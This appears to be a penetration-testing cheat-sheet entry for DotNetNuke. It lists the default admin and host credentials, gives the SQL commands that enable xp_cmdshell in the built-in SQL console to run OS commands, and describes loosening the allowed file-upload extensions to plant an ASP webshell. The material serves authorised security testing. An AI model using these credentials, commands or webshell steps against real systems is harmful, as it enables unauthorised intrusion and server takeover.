DNN

Default Creds

$ creds search DotNetNuke
+------------------------+----------+----------+
| Product                | username | password |
+------------------------+----------+----------+
| dotnetnuke corporation |  admin   | dnnadmin |
| dotnetnuke corporation |   host   | dnnhost  |
+------------------------+----------+----------+

RCE

SQL Console

System commands can be run via the built-in SQL console under the Settings menu.

-- enable xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

After pressing Run Script, OS commands can be executed:

xp_cmdshell 'whoami'

ASP Webshell

If the SuperUser account is compromised, we can access the Security settings (Figure 1) and allow any file extensions needed so we can upload a webshell (Figure 2).

Figure 1: Accessing the Security settings.
Figure 2: Add the desired file extensions.

Upload a webshell, such as this .asp webshell (Figure 3).

Figure 3: Upload the webshell.

Get the file's URL by right-clicking and interact with the webshell.

Figure 4: Get the URL and interact with the webshell.
